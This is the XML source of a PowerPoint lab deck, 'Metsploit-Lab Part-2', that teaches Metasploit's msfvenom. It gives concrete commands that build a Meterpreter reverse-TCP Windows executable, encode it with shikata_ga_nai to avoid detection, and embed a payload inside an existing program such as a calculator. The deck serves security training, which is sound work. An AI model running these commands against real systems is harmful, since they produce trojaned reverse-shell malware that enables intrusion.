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7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89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317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10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6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12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05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20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57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10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CDB99-F452-4EAF-BA10-3B6DFD49BF5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3C90-8E56-47C2-990F-B7BCF6738E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85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CCD1-DFBB-3B57-B9AC-E85D03CFC4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Metsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Lab Part-2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401B1D-8789-DC53-9F68-0CBBE4DC38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Diving Deeper into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>msfvenom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2D9BB-E2DC-3FF3-BE05-322F8803363D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264024" y="4820771"/>
            <a:ext cx="685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Objective: Understand the purpose and functionality of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for generating and encoding payloads.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839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E45BF-E210-4012-D5A1-5E4B520E8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618565"/>
            <a:ext cx="8013326" cy="5558398"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encoder with 5 iterations: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sz="4400" dirty="0" err="1">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" err="1">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" err="1">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.100 LPORT=4444 -f exe -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" err="1">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" err="1">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0">
                <a:latin typeface="Mesquite Std" panose="00000600000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t> 5 &gt; encoded_reverse_shell.exe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1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4E58F-5110-15C2-009E-225614FB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Embedding Payloads in Existing Programs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C45BB-DBEE-8842-98F4-5DCF33C6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This technique embeds a Metasploit payload into an existing application, ensuring that both the payload and the original program run simultaneously.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Command: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msfvenom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-x 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path_to_existing_exe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 -k -p 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payload_type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 LHOST=[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Your_IP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 LPORT=[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Port_Number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] -f exe &gt;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output_filename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15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73DCB-286E-A46A-E046-242D93A9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Example embedding into a calculator application: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8282-A27A-1F44-F915-552ADEC8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055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C994-1ABE-38C3-50EC-49D5E757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B556-899D-E33F-7414-DB324BE7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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a versatile tool that combines the functionalities of two older Metasploit utilities, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Its primary purpose is to generate and encode payloads, making them ready for deployment against a target.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1931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206F-4AC0-7DD1-F56B-DB6FD8446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Söhne"/>
              </a:rPr>
              <a:t>Step-by-Step Guide:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0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0CD87-5AC2-593D-FF6D-0C02D8F0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Understanding Payload Components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Payloads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are specially crafted data that can perform a specific function on a system, such as creating a reverse shell or adding a user.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Each payload in Metasploit is designated for a specific platform and purpose. Payloads are composed of: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Stagers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Establish a communication channel between the victim and attacker.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Stages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: Actual payload content, like the Meterpreter shell, delivered by stagers.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144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3274-A92B-9AD6-1BB6-F509D347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Basic Payload Generation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8A87-B87E-CA17-9433-315745C1E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56762" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> -p [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>payload_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>] LHOST=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>Your_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>] LPORT=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>Port_Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>] -f [format] &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>output_filename</a:t>
            </a:r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722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1D657-6ADF-8647-57A6-C8999A1C0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46BA-2B9A-94A9-8A2C-FE3458B3B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-p: Specify the payload type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LHOST: Address of the machine the payload should connect back to (typically the attacker's machine).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LPORT: Port number for the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-f: Output format. Common formats are exe, elf, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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708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0E2EE-A2D2-FEE9-1588-C7018A5E2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591671"/>
            <a:ext cx="7941609" cy="5585292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-p: Specify the payload type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LHOST: Address of the machine the payload should connect back to (typically the attacker's machine).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LPORT: Port number for the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-f: Output format. Common formats are exe, elf, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>php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801916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CF878-7B33-7EBE-CA3F-7519CE8EA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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> LHOST=192.168.1.100 LPORT=4444 -f exe &gt; reverse_shell.exe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9479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01C4-F58E-9DE2-238B-795B8610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Listing Available Payloads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B406-4A9F-8826-1AE9-6C134CF5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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> --list payloads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90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46A2-273E-3435-EA9E-38DC01AD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Payload Encoding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B3A26-FF1D-CD2B-5851-BCFA8900C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Encoding is used to modify the appearance of a payload, often to avoid detection or to ensure it gets executed without interruption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US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Command :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just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> -p [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>payload_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>] LHOST=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>Your_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>] LPORT=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>Port_Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>] -f [format] -e [encoder] -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> [iterations] &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>output_filename</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="18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562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164</TotalTime>
  <Words>509</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)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Mesquite Std</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Metsploit-Lab Part-2</vt:lpstr>
      <vt:lpstr>Introduction:</vt:lpstr>
      <vt:lpstr>Step-by-Step Guide: </vt:lpstr>
      <vt:lpstr>Basic Payload Generation:</vt:lpstr>
      <vt:lpstr>Explanation:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Listing Available Payloads:</vt:lpstr>
      <vt:lpstr>Payload Encoding:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Embedding Payloads in Existing Programs:</vt:lpstr>
      <vt:lpstr>Example embedding into a calculator application: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Metsploit-Lab Part-2</dc:title>
  <dc:creator>Soumya S</dc:creator>
  <cp:lastModifiedBy>Soumya S</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T11:16:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T08:32:55Z</dcterms:modified>
</cp:coreProperties>
</file>